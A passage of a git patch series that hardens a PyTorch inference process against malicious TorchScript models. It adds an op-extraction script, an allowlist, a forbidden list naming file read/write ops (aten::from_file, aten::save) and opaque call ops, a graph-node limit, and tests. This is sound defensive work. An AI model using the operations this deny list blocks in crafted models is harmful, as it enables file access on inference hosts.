traces/scripts reference models and collects the set of +TorchScript operations that appear in their forward() computation graphs. +The output is a sorted, de-duplicated union of all operations which can be +used to build the C++ allowlist in CSupportedOperations.h. + +Usage: + python3 extract_model_ops.py [--per-model] [--cpp] [--config CONFIG] + +Flags: + --per-model Print the op set for each model individually. + --cpp Print the union as a C++ initializer list. + --config CONFIG Path to the reference models JSON config file. + Defaults to reference_models.json in the same directory. +""" + +import argparse +import json +import os +import sys +from pathlib import Path + +import torch +from transformers import AutoConfig, AutoModel, AutoTokenizer + +SCRIPT_DIR = Path(__file__).resolve().parent +DEFAULT_CONFIG = SCRIPT_DIR / "reference_models.json" + + +def load_reference_models(config_path: Path) -> dict[str, str]: + """Load the architecture-to-model mapping from a JSON config file.""" + with open(config_path) as f: + return json.load(f) + + +def collect_graph_ops(graph): + """Collect all operation names from a TorchScript graph, including blocks.""" + ops = set() + for node in graph.nodes(): + ops.add(node.kind()) + for block in node.blocks(): + ops.update(collect_graph_ops(block)) + return ops + + +def collect_all_module_ops(module): + """Collect all ops by inlining method calls and walking the flattened graph.""" + forward = module.forward + graph = forward.graph.copy() + torch._C._jit_pass_inline(graph) + return collect_graph_ops(graph) + + +def extract_ops_for_model(model_name: str) -> set[str]: + """Trace a HuggingFace model and return its TorchScript op set.""" + print(f" Loading {model_name}...", file=sys.stderr) + token = os.environ.get("HF_TOKEN") + tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) + config = AutoConfig.from_pretrained(model_name, torchscript=True, token=token) + model = AutoModel.from_pretrained(model_name, config=config, token=token) + model.eval() + + inputs = tokenizer("This is a sample input for graph extraction.", + return_tensors="pt", padding="max_length", + max_length=32, truncation=True) + + input_ids = inputs["input_ids"] + attention_mask = inputs["attention_mask"] + + try: + traced = torch.jit.trace(model, (input_ids, attention_mask), strict=False) + except Exception as e: + print(f" Warning: trace failed for {model_name}: {e}", file=sys.stderr) + print(f" Falling back to torch.jit.script...", file=sys.stderr) + try: + traced = torch.jit.script(model) + except Exception as e2: + print(f" Error: script also failed for {model_name}: {e2}", file=sys.stderr) + return set() + + return collect_all_module_ops(traced) + + +def format_cpp_initializer(ops: set[str]) -> str: + """Format the op set as a C++ initializer list for std::unordered_set.""" + sorted_ops = sorted(ops) + lines = [] + for op in sorted_ops: + lines.append(f' "{op}"sv,') + return "{\n" + "\n".join(lines) + "\n}" + + +def main(): + parser = argparse.ArgumentParser(description=__doc__, + formatter_class=argparse.RawDescriptionHelpFormatter) + parser.add_argument("--per-model", action="store_true", + help="Print per-model op sets") + parser.add_argument("--cpp", action="store_true", + help="Print union as C++ initializer") + parser.add_argument("--config", type=Path, default=DEFAULT_CONFIG, + help="Path to reference_models.json config file") + args = parser.parse_args() + + reference_models = load_reference_models(args.config) + + per_model_ops = {} + union_ops = set() + + print("Extracting TorchScript ops from supported architectures...", + file=sys.stderr) + + for arch, model_name in reference_models.items(): + ops = extract_ops_for_model(model_name) + per_model_ops[arch] = ops + union_ops.update(ops) + print(f" {arch}: {len(ops)} ops", file=sys.stderr) + + print(f"\nTotal union: {len(union_ops)} unique ops", file=sys.stderr) + + if args.per_model: + for arch, ops in sorted(per_model_ops.items()): + print(f"\n=== {arch} ({reference_models[arch]}) ===") + for op in sorted(ops): + print(f" {op}") + + if args.cpp: + print("\n// C++ initializer for SUPPORTED_OPERATIONS:") + print(format_cpp_initializer(union_ops)) + else: + print("\n// Sorted union of all operations:") + for op in sorted(union_ops): + print(op) + + +if __name__ == "__main__": + main() diff --git a/dev-tools/extract_model_ops/reference_models.json b/dev-tools/extract_model_ops/reference_models.json new file mode 100644 index 000000000..a70fa6792 --- /dev/null +++ b/dev-tools/extract_model_ops/reference_models.json @@ -0,0 +1,12 @@ +{ + "bert": "bert-base-uncased", + "roberta": "roberta-base", + "distilbert": "distilbert-base-uncased", + "electra": "google/electra-small-discriminator", + "mpnet": "microsoft/mpnet-base", + "deberta": "microsoft/deberta-base", + "bart": "facebook/bart-base", + "dpr": "facebook/dpr-ctx_encoder-single-nq-base", + "mobilebert": "google/mobilebert-uncased", + "xlm-roberta": "xlm-roberta-base" +} diff --git a/dev-tools/extract_model_ops/requirements.txt b/dev-tools/extract_model_ops/requirements.txt new file mode 100644 index 000000000..ce6a7c42f --- /dev/null +++ b/dev-tools/extract_model_ops/requirements.txt @@ -0,0 +1,2 @@ +torch>=2.3.0 +transformers>=4.40.0 From df9b6ee203eb9776f2586e0ee243e21d6fa41d16 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 12:12:31 +1300 Subject: [PATCH 03/30] [ML] Add Elastic HuggingFace models to reference config and harden script - Add all 10 elastic/* models from HuggingFace to reference_models.json - Make extract_model_ops.py resilient to individual model load/trace failures (continues to next model instead of crashing) - Add sentencepiece and protobuf to requirements.txt - Add .gitignore for .venv directory - Update CSupportedOperations.cc comment with expanded model list - Op union remains 71 ops (Elastic models use same base architectures) Made-with: Cursor --- bin/pytorch_inference/CSupportedOperations.cc | 9 ++++-- dev-tools/extract_model_ops/.gitignore | 1 + .../extract_model_ops/extract_model_ops.py | 32 ++++++++++++++----- .../extract_model_ops/reference_models.json | 12 ++++++- dev-tools/extract_model_ops/requirements.txt | 2 ++ 5 files changed, 44 insertions(+), 12 deletions(-) create mode 100644 dev-tools/extract_model_ops/.gitignore diff --git a/bin/pytorch_inference/CSupportedOperations.cc b/bin/pytorch_inference/CSupportedOperations.cc index 31f567e64..365913b17 100644 --- a/bin/pytorch_inference/CSupportedOperations.cc +++ b/bin/pytorch_inference/CSupportedOperations.cc @@ -24,9 +24,12 @@ const CSupportedOperations::TStringViewSet CSupportedOperations::FORBIDDEN_OPERA // Generated by dev-tools/extract_model_ops/extract_model_ops.py against PyTorch 2.10.0. // Reference models: bert-base-uncased, roberta-base, distilbert-base-uncased, // google/electra-small-discriminator, microsoft/mpnet-base, -// microsoft/deberta-base, facebook/bart-base, -// facebook/dpr-ctx_encoder-single-nq-base, google/mobilebert-uncased, -// xlm-roberta-base. +// microsoft/deberta-base, facebook/dpr-ctx_encoder-single-nq-base, +// google/mobilebert-uncased, xlm-roberta-base, elastic/bge-m3, +// elastic/distilbert-base-{cased,uncased}-finetuned-conll03-english, +// elastic/eis-elser-v2, elastic/elser-v2, elastic/hugging-face-elser, +// elastic/multilingual-e5-small-optimized, elastic/splade-v3, +// elastic/test-elser-v2. const CSupportedOperations::TStringViewSet CSupportedOperations::ALLOWED_OPERATIONS = { // aten operations (core tensor computations) "aten::Int"sv, diff --git a/dev-tools/extract_model_ops/.gitignore b/dev-tools/extract_model_ops/.gitignore new file mode 100644 index 000000000..21d0b898f --- /dev/null +++ b/dev-tools/extract_model_ops/.gitignore @@ -0,0 +1 @@ +.venv/ diff --git a/dev-tools/extract_model_ops/extract_model_ops.py b/dev-tools/extract_model_ops/extract_model_ops.py index bd12021b3..46a97351b 100644 --- a/dev-tools/extract_model_ops/extract_model_ops.py +++ b/dev-tools/extract_model_ops/extract_model_ops.py @@ -63,14 +63,22 @@ def collect_all_module_ops(module): return collect_graph_ops(graph) -def extract_ops_for_model(model_name: str) -> set[str]: - """Trace a HuggingFace model and return its TorchScript op set.""" +def extract_ops_for_model(model_name: str) -> set[str] | None: + """Trace a HuggingFace model and return its TorchScript op set. + + Returns None if the model could not be loaded or traced. + """ print(f" Loading {model_name}...", file=sys.stderr) token = os.environ.get("HF_TOKEN") - tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) - config = AutoConfig.from_pretrained(model_name, torchscript=True, token=token) - model = AutoModel.from_pretrained(model_name, config=config, token=token) - model.eval() + + try: + tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) + config = AutoConfig.from_pretrained(model_name, torchscript=True, token=token) + model = AutoModel.from_pretrained(model_name, config=config, token=token) + model.eval() + except Exception as e: + print(f" Error: failed to load {model_name}: {e}", file=sys.stderr) + return None inputs = tokenizer("This is a sample input for graph extraction.", return_tensors="pt", padding="max_length", @@ -87,8 +95,9 @@ def extract_ops_for_model(model_name: str) -> set[str]: try: traced = torch.jit.script(model) except Exception as e2: - print(f" Error: script also failed for {model_name}: {e2}", file=sys.stderr) - return set() + print(f" Error: script also failed for {model_name}: {e2}", + file=sys.stderr) + return None return collect_all_module_ops(traced) @@ -121,13 +130,20 @@ def main(): print("Extracting TorchScript ops from supported architectures...", file=sys.stderr) + failed = [] for arch, model_name in reference_models.items(): ops = extract_ops_for_model(model_name) + if ops is None: + failed.append(arch) + print(f" {arch}: FAILED", file=sys.stderr) + continue per_model_ops[arch] = ops union_ops.update(ops) print(f" {arch}: {len(ops)} ops", file=sys.stderr) print(f"\nTotal union: {len(union_ops)} unique ops", file=sys.stderr) + if failed: + print(f"Failed models: {', '.join(failed)}", file=sys.stderr) if args.per_model: for arch, ops in sorted(per_model_ops.items()): diff --git a/dev-tools/extract_model_ops/reference_models.json b/dev-tools/extract_model_ops/reference_models.json index a70fa6792..5c3980ecb 100644 --- a/dev-tools/extract_model_ops/reference_models.json +++ b/dev-tools/extract_model_ops/reference_models.json @@ -8,5 +8,15 @@ "bart": "facebook/bart-base", "dpr": "facebook/dpr-ctx_encoder-single-nq-base", "mobilebert": "google/mobilebert-uncased", - "xlm-roberta": "xlm-roberta-base" + "xlm-roberta": "xlm-roberta-base", + "elastic-bge-m3": "elastic/bge-m3", + "elastic-distilbert-cased-ner": "elastic/distilbert-base-cased-finetuned-conll03-english", + "elastic-distilbert-uncased-ner": "elastic/distilbert-base-uncased-finetuned-conll03-english", + "elastic-eis-elser-v2": "elastic/eis-elser-v2", + "elastic-elser-v2": "elastic/elser-v2", + "elastic-hugging-face-elser": "elastic/hugging-face-elser", + "elastic-multilingual-e5-small": "elastic/multilingual-e5-small", + "elastic-multilingual-e5-small-optimized": "elastic/multilingual-e5-small-optimized", + "elastic-splade-v3": "elastic/splade-v3", + "elastic-test-elser-v2": "elastic/test-elser-v2" } diff --git a/dev-tools/extract_model_ops/requirements.txt b/dev-tools/extract_model_ops/requirements.txt index ce6a7c42f..0d08c33d1 100644 --- a/dev-tools/extract_model_ops/requirements.txt +++ b/dev-tools/extract_model_ops/requirements.txt @@ -1,2 +1,4 @@ torch>=2.3.0 transformers>=4.40.0 +sentencepiece>=0.2.0 +protobuf>=5.0.0 From 6f0b8ed3a14a1aa96deab9856266625e82705c1c Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 13:35:07 +1300 Subject: [PATCH 04/30] [ML] Remove models that fail tracing from reference config Remove bart and elastic/multilingual-e5-small which cannot be traced or scripted with the current transformers/torch versions. Made-with: Cursor --- dev-tools/extract_model_ops/reference_models.json | 2 -- 1 file changed, 2 deletions(-) diff --git a/dev-tools/extract_model_ops/reference_models.json b/dev-tools/extract_model_ops/reference_models.json index 5c3980ecb..255762721 100644 --- a/dev-tools/extract_model_ops/reference_models.json +++ b/dev-tools/extract_model_ops/reference_models.json @@ -5,7 +5,6 @@ "electra": "google/electra-small-discriminator", "mpnet": "microsoft/mpnet-base", "deberta": "microsoft/deberta-base", - "bart": "facebook/bart-base", "dpr": "facebook/dpr-ctx_encoder-single-nq-base", "mobilebert": "google/mobilebert-uncased", "xlm-roberta": "xlm-roberta-base", @@ -15,7 +14,6 @@ "elastic-eis-elser-v2": "elastic/eis-elser-v2", "elastic-elser-v2": "elastic/elser-v2", "elastic-hugging-face-elser": "elastic/hugging-face-elser", - "elastic-multilingual-e5-small": "elastic/multilingual-e5-small", "elastic-multilingual-e5-small-optimized": "elastic/multilingual-e5-small-optimized", "elastic-splade-v3": "elastic/splade-v3", "elastic-test-elser-v2": "elastic/test-elser-v2" From 900ad1087cf9e1c36b3ff1504fd16ca31ebc34c3 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 13:45:23 +1300 Subject: [PATCH 05/30] [ML] Document rationale for dual forbidden/allowed operation lists Explain why both a short forbidden list and a broad allowed list are maintained: targeted error messages, safety net against accidental allowlist expansion, and defence-in-depth. Made-with: Cursor --- bin/pytorch_inference/CModelGraphValidator.cc | 4 ++++ bin/pytorch_inference/CSupportedOperations.h | 17 +++++++++++++++++ 2 files changed, 21 insertions(+) diff --git a/bin/pytorch_inference/CModelGraphValidator.cc b/bin/pytorch_inference/CModelGraphValidator.cc index dd88cada6..5fd06ad7d 100644 --- a/bin/pytorch_inference/CModelGraphValidator.cc +++ b/bin/pytorch_inference/CModelGraphValidator.cc @@ -36,6 +36,10 @@ CModelGraphValidator::validate(const TStringSet& observedOps, SResult result; + // Check forbidden ops first so they are always reported with a specific + // error even if they also appear in the allowed set. See the comment on + // CSupportedOperations::FORBIDDEN_OPERATIONS for the rationale behind + // maintaining both a forbidden list and an allowed list. for (const auto& op : observedOps) { if (forbiddenOps.contains(op)) { result.s_IsValid = false; diff --git a/bin/pytorch_inference/CSupportedOperations.h b/bin/pytorch_inference/CSupportedOperations.h index 2c51c5919..3719bec80 100644 --- a/bin/pytorch_inference/CSupportedOperations.h +++ b/bin/pytorch_inference/CSupportedOperations.h @@ -40,6 +40,23 @@ class CSupportedOperations { using TStringViewSet = std::unordered_set; //! Operations explicitly forbidden regardless of the allowlist. + //! + //! The forbidden list is checked separately from (and takes precedence + //! over) the allowed list. This two-tier approach provides: + //! + //! 1. Stable, targeted error messages for known-dangerous operations + //! (e.g. "model contains forbidden operation: aten::save") rather + //! than the generic "unrecognised operation" that the allowlist + //! would produce. This helps model authors diagnose rejections. + //! + //! 2. A safety net against accidental allowlist expansion. If a + //! future PyTorch upgrade or new architecture inadvertently adds + //! a dangerous op to the allowed set, the forbidden list still + //! blocks it. The forbidden check is independent of regeneration. + //! + //! 3. Defence-in-depth: two independent mechanisms must both agree + //! before an operation is permitted, reducing the risk of a + //! single-point allowlist error opening an attack vector. static const TStringViewSet FORBIDDEN_OPERATIONS; //! Union of all TorchScript operations observed in supported architectures. From 3a7b090de004579248b36f6a852ffab7c589ab0b Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 14:10:43 +1300 Subject: [PATCH 06/30] [ML] Pin extraction to PyTorch 2.7.1 matching libtorch build version Re-ran extraction with torch 2.7.1 (matching the libtorch version linked by ml-cpp) -- op set is identical to the 2.10.0 run. Pin torch version in requirements.txt and fix the comment. Made-with: Cursor --- bin/pytorch_inference/CSupportedOperations.cc | 2 +- dev-tools/extract_model_ops/requirements.txt | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/bin/pytorch_inference/CSupportedOperations.cc b/bin/pytorch_inference/CSupportedOperations.cc index 365913b17..b3f96b456 100644 --- a/bin/pytorch_inference/CSupportedOperations.cc +++ b/bin/pytorch_inference/CSupportedOperations.cc @@ -21,7 +21,7 @@ const CSupportedOperations::TStringViewSet CSupportedOperations::FORBIDDEN_OPERA "aten::save"sv, }; -// Generated by dev-tools/extract_model_ops/extract_model_ops.py against PyTorch 2.10.0. +// Generated by dev-tools/extract_model_ops/extract_model_ops.py against PyTorch 2.7.1. // Reference models: bert-base-uncased, roberta-base, distilbert-base-uncased, // google/electra-small-discriminator, microsoft/mpnet-base, // microsoft/deberta-base, facebook/dpr-ctx_encoder-single-nq-base, diff --git a/dev-tools/extract_model_ops/requirements.txt b/dev-tools/extract_model_ops/requirements.txt index 0d08c33d1..70d0ebb78 100644 --- a/dev-tools/extract_model_ops/requirements.txt +++ b/dev-tools/extract_model_ops/requirements.txt @@ -1,4 +1,4 @@ -torch>=2.3.0 +torch==2.7.1 transformers>=4.40.0 sentencepiece>=0.2.0 protobuf>=5.0.0 From ad5c0afe3b60c9b9190045489c8072b6a5a30bfd Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 14:26:10 +1300 Subject: [PATCH 07/30] [ML] Log observed TorchScript ops at DEBUG level during validation Aids debugging when a legitimate model is unexpectedly rejected after a PyTorch upgrade, and provides an audit trail of what was loaded. Made-with: Cursor --- bin/pytorch_inference/CModelGraphValidator.cc | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/bin/pytorch_inference/CModelGraphValidator.cc b/bin/pytorch_inference/CModelGraphValidator.cc index 5fd06ad7d..dcf24f442 100644 --- a/bin/pytorch_inference/CModelGraphValidator.cc +++ b/bin/pytorch_inference/CModelGraphValidator.cc @@ -25,6 +25,11 @@ CModelGraphValidator::SResult CModelGraphValidator::validate(const ::torch::jit: TStringSet observedOps; collectModuleOps(module, observedOps); + LOG_DEBUG(<< "Model graph contains " << observedOps.size() << " distinct operations"); + for (const auto& op : observedOps) { + LOG_DEBUG(<< " observed op: " << op); + } + return validate(observedOps, CSupportedOperations::ALLOWED_OPERATIONS, CSupportedOperations::FORBIDDEN_OPERATIONS); } From 08b60c540fe1ca5e3fdbeba6ac756be1daa69654 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 14:28:30 +1300 Subject: [PATCH 08/30] [ML] Inline TorchScript graph before validation and forbid prim::CallMethod Use torch::jit::Inline() to flatten method calls before collecting operations. This ensures ops hidden behind prim::CallMethod are surfaced for validation. After inlining, prim::CallMethod and prim::CallFunction should not appear; add them to the forbidden list so any unresolvable call is explicitly rejected. Made-with: Cursor --- bin/pytorch_inference/CModelGraphValidator.cc | 37 ++++++++++++------- bin/pytorch_inference/CModelGraphValidator.h | 14 +++++-- bin/pytorch_inference/CSupportedOperations.cc | 4 ++ .../unittest/CModelGraphValidatorTest.cc | 28 ++++++++++++++ 4 files changed, 67 insertions(+), 16 deletions(-) diff --git a/bin/pytorch_inference/CModelGraphValidator.cc b/bin/pytorch_inference/CModelGraphValidator.cc index dcf24f442..685ee60c1 100644 --- a/bin/pytorch_inference/CModelGraphValidator.cc +++ b/bin/pytorch_inference/CModelGraphValidator.cc @@ -15,6 +15,8 @@ #include +#include + #include namespace ml { @@ -23,15 +25,19 @@ namespace torch { CModelGraphValidator::SResult CModelGraphValidator::validate(const ::torch::jit::Module& module) { TStringSet observedOps; - collectModuleOps(module, observedOps); + std::size_t nodeCount{0}; + collectModuleOps(module, observedOps, nodeCount); - LOG_DEBUG(<< "Model graph contains " << observedOps.size() << " distinct operations"); + LOG_DEBUG(<< "Model graph contains " << observedOps.size() + << " distinct operations across " << nodeCount << " nodes"); for (const auto& op : observedOps) { LOG_DEBUG(<< " observed op: " << op); } - return validate(observedOps, CSupportedOperations::ALLOWED_OPERATIONS, - CSupportedOperations::FORBIDDEN_OPERATIONS); + auto result = validate(observedOps, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + result.s_NodeCount = nodeCount; + return result; } CModelGraphValidator::SResult @@ -61,24 +67,29 @@ CModelGraphValidator::validate(const TStringSet& observedOps, return result; } -void CModelGraphValidator::collectBlockOps(const ::torch::jit::Block& block, TStringSet& ops) { +void CModelGraphValidator::collectBlockOps(const ::torch::jit::Block& block, + TStringSet& ops, + std::size_t& nodeCount) { for (const auto* node : block.nodes()) { + ++nodeCount; ops.emplace(node->kind().toQualString()); for (const auto* subBlock : node->blocks()) { - collectBlockOps(*subBlock, ops); + collectBlockOps(*subBlock, ops, nodeCount); } } } void CModelGraphValidator::collectModuleOps(const ::torch::jit::Module& module, - TStringSet& ops) { + TStringSet& ops, + std::size_t& nodeCount) { for (const auto& method : module.get_methods()) { - auto graph = method.graph(); - collectBlockOps(*graph->block(), ops); - } - - for (const auto& child : module.children()) { - collectModuleOps(child, ops); + // Inline all method calls so that operations hidden behind + // prim::CallMethod are surfaced. After inlining, any remaining + // prim::CallMethod indicates a call that could not be resolved + // statically and will be flagged as unrecognised. + auto graph = method.graph()->copy(); + ::torch::jit::Inline(*graph); + collectBlockOps(*graph->block(), ops, nodeCount); } } } diff --git a/bin/pytorch_inference/CModelGraphValidator.h b/bin/pytorch_inference/CModelGraphValidator.h index 8a47dd158..1600fe6a8 100644 --- a/bin/pytorch_inference/CModelGraphValidator.h +++ b/bin/pytorch_inference/CModelGraphValidator.h @@ -50,6 +50,7 @@ class CModelGraphValidator { bool s_IsValid{true}; TStringVec s_ForbiddenOps; TStringVec s_UnrecognisedOps; + std::size_t s_NodeCount{0}; }; public: @@ -66,10 +67,17 @@ class CModelGraphValidator { private: //! Collect all operation names from a block, recursing into sub-blocks. - static void collectBlockOps(const ::torch::jit::Block& block, TStringSet& ops); + static void collectBlockOps(const ::torch::jit::Block& block, + TStringSet& ops, + std::size_t& nodeCount); - //! Recursively collect ops from all methods of a module and its children. - static void collectModuleOps(const ::torch::jit::Module& module, TStringSet& ops); + //! Inline all method calls and collect ops from the flattened graph. + //! After inlining, prim::CallMethod should not appear; if it does, + //! the call could not be resolved statically and is treated as + //! unrecognised. + static void collectModuleOps(const ::torch::jit::Module& module, + TStringSet& ops, + std::size_t& nodeCount); }; } } diff --git a/bin/pytorch_inference/CSupportedOperations.cc b/bin/pytorch_inference/CSupportedOperations.cc index b3f96b456..c1b416e58 100644 --- a/bin/pytorch_inference/CSupportedOperations.cc +++ b/bin/pytorch_inference/CSupportedOperations.cc @@ -19,6 +19,10 @@ using namespace std::string_view_literals; const CSupportedOperations::TStringViewSet CSupportedOperations::FORBIDDEN_OPERATIONS = { "aten::from_file"sv, "aten::save"sv, + // After graph inlining, method and function calls should be resolved. + // Their presence indicates an opaque call that cannot be validated. + "prim::CallFunction"sv, + "prim::CallMethod"sv, }; // Generated by dev-tools/extract_model_ops/extract_model_ops.py against PyTorch 2.7.1. diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index 2404b50d3..e39a40485 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -188,6 +188,34 @@ BOOST_AUTO_TEST_CASE(testCustomAllowlistAndForbiddenList) { BOOST_REQUIRE_EQUAL(1, result.s_UnrecognisedOps.size()); } +BOOST_AUTO_TEST_CASE(testCallMethodForbiddenAfterInlining) { + // prim::CallMethod must not appear after graph inlining; its presence + // means a method call could not be resolved and the graph cannot be + // fully validated. + TStringSet observed{"aten::linear", "prim::Constant", "prim::CallMethod"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(1, result.s_ForbiddenOps.size()); + BOOST_REQUIRE_EQUAL("prim::CallMethod", result.s_ForbiddenOps[0]); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); +} + +BOOST_AUTO_TEST_CASE(testCallFunctionForbiddenAfterInlining) { + TStringSet observed{"aten::linear", "prim::CallFunction"}; + + auto result = CModelGraphValidator::validate( + observed, CSupportedOperations::ALLOWED_OPERATIONS, + CSupportedOperations::FORBIDDEN_OPERATIONS); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE_EQUAL(1, result.s_ForbiddenOps.size()); + BOOST_REQUIRE_EQUAL("prim::CallFunction", result.s_ForbiddenOps[0]); +} + BOOST_AUTO_TEST_CASE(testForbiddenOpAlsoInAllowlist) { // If an op appears in both forbidden and allowed, forbidden takes precedence. TStringViewSet allowed{"aten::from_file", "aten::linear"}; From 41305da813ccd199a74acdf3b86133be877a6f3a Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 14:29:27 +1300 Subject: [PATCH 09/30] [ML] Enforce maximum graph node count to bound resource consumption Reject models whose inlined computation graph exceeds 1M nodes. Typical transformer models have O(10k) nodes; the generous limit prevents pathologically crafted models from causing excessive memory or CPU usage during graph traversal. Made-with: Cursor --- bin/pytorch_inference/CModelGraphValidator.h | 6 ++++++ bin/pytorch_inference/Main.cc | 9 ++++++++- .../unittest/CModelGraphValidatorTest.cc | 5 +++++ 3 files changed, 19 insertions(+), 1 deletion(-) diff --git a/bin/pytorch_inference/CModelGraphValidator.h b/bin/pytorch_inference/CModelGraphValidator.h index 1600fe6a8..2c589dab5 100644 --- a/bin/pytorch_inference/CModelGraphValidator.h +++ b/bin/pytorch_inference/CModelGraphValidator.h @@ -45,6 +45,12 @@ class CModelGraphValidator { using TStringSet = std::unordered_set; using TStringVec = std::vector; + //! Upper bound on the number of graph nodes we are willing to inspect. + //! Transformer models typically have O(10k) nodes after inlining; a + //! limit of 1M provides generous headroom while preventing a + //! pathologically large graph from consuming unbounded memory or CPU. + static constexpr std::size_t MAX_NODE_COUNT{1000000}; + //! Result of validating a model graph. struct SResult { bool s_IsValid{true}; diff --git a/bin/pytorch_inference/Main.cc b/bin/pytorch_inference/Main.cc index 61053a583..f8e159f51 100644 --- a/bin/pytorch_inference/Main.cc +++ b/bin/pytorch_inference/Main.cc @@ -70,11 +70,18 @@ void verifySafeModel(const torch::jit::script::Module& module_) { << "Unrecognised operations: " << ops); } + if (result.s_NodeCount > ml::torch::CModelGraphValidator::MAX_NODE_COUNT) { + HANDLE_FATAL(<< "Model graph is too large: " << result.s_NodeCount + << " nodes exceeds limit of " + << ml::torch::CModelGraphValidator::MAX_NODE_COUNT); + } + if (result.s_IsValid == false) { HANDLE_FATAL(<< "Model graph validation failed"); } - LOG_DEBUG(<< "Model verified: all operations match supported architectures."); + LOG_DEBUG(<< "Model verified: " << result.s_NodeCount + << " nodes, all operations match supported architectures."); } catch (const c10::Error& e) { LOG_FATAL(<< "Model graph validation failed: " << e.what()); } diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index e39a40485..5f77572e3 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -216,6 +216,11 @@ BOOST_AUTO_TEST_CASE(testCallFunctionForbiddenAfterInlining) { BOOST_REQUIRE_EQUAL("prim::CallFunction", result.s_ForbiddenOps[0]); } +BOOST_AUTO_TEST_CASE(testMaxNodeCountConstant) { + BOOST_REQUIRE(CModelGraphValidator::MAX_NODE_COUNT > 0); + BOOST_REQUIRE_EQUAL(std::size_t{1000000}, CModelGraphValidator::MAX_NODE_COUNT); +} + BOOST_AUTO_TEST_CASE(testForbiddenOpAlsoInAllowlist) { // If an op appears in both forbidden and allowed, forbidden takes precedence. TStringViewSet allowed{"aten::from_file", "aten::linear"}; From c81613135f05c5e9950d0e1442a15349537ee5cf Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 14:31:45 +1300 Subject: [PATCH 10/30] [ML] Add integration tests using real TorchScript modules Construct scriptable modules with define() and validate them through the full CModelGraphValidator pipeline. Covers: a valid module with allowed ops, a module with unrecognised ops, node count tracking, and a parent/child module pair that exercises graph inlining. Made-with: Cursor --- .../unittest/CModelGraphValidatorTest.cc | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index 5f77572e3..ba2411ac0 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -15,6 +15,8 @@ #include +#include + #include #include #include @@ -233,4 +235,88 @@ BOOST_AUTO_TEST_CASE(testForbiddenOpAlsoInAllowlist) { BOOST_REQUIRE_EQUAL("aten::from_file", result.s_ForbiddenOps[0]); } +// --- Integration tests using real TorchScript modules --- + +BOOST_AUTO_TEST_CASE(testValidModuleWithAllowedOps) { + // A simple module using only aten::add and aten::mul, both of which + // are in the allowed set. + ::torch::jit::Module m("__torch__.ValidModel"); + m.define(R"( + def forward(self, x: Tensor) -> Tensor: + return x + x * x + )"); + + auto result = CModelGraphValidator::validate(m); + + BOOST_REQUIRE(result.s_IsValid); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty()); + BOOST_REQUIRE(result.s_NodeCount > 0); +} + +BOOST_AUTO_TEST_CASE(testModuleWithUnrecognisedOps) { + // torch.sin is not in the transformer allowlist. + ::torch::jit::Module m("__torch__.UnknownOps"); + m.define(R"( + def forward(self, x: Tensor) -> Tensor: + return torch.sin(x) + )"); + + auto result = CModelGraphValidator::validate(m); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(result.s_UnrecognisedOps.empty() == false); + bool foundSin = false; + for (const auto& op : result.s_UnrecognisedOps) { + if (op == "aten::sin") { + foundSin = true; + } + } + BOOST_REQUIRE(foundSin); +} + +BOOST_AUTO_TEST_CASE(testModuleNodeCountPopulated) { + ::torch::jit::Module m("__torch__.NodeCount"); + m.define(R"( + def forward(self, x: Tensor) -> Tensor: + a = x + x + b = a * a + c = b - a + return c + )"); + + auto result = CModelGraphValidator::validate(m); + + BOOST_REQUIRE(result.s_NodeCount > 0); +} + +BOOST_AUTO_TEST_CASE(testModuleWithSubmoduleInlines) { + // Create a parent module with a child submodule. After inlining, + // the child's operations should be visible and validated. + ::torch::jit::Module child("__torch__.Child"); + child.define(R"( + def forward(self, x: Tensor) -> Tensor: + return torch.sin(x) + )"); + + ::torch::jit::Module parent("__torch__.Parent"); + parent.register_module("child", child); + parent.define(R"( + def forward(self, x: Tensor) -> Tensor: + return self.child.forward(x) + x + )"); + + auto result = CModelGraphValidator::validate(parent); + + BOOST_REQUIRE(result.s_IsValid == false); + bool foundSin = false; + for (const auto& op : result.s_UnrecognisedOps) { + if (op == "aten::sin") { + foundSin = true; + } + } + BOOST_REQUIRE(foundSin); +} + BOOST_AUTO_TEST_SUITE_END() From ed0b71084561c96bb2ab6bda821c9d502e1f3959 Mon Sep 17 00:00:00 2001 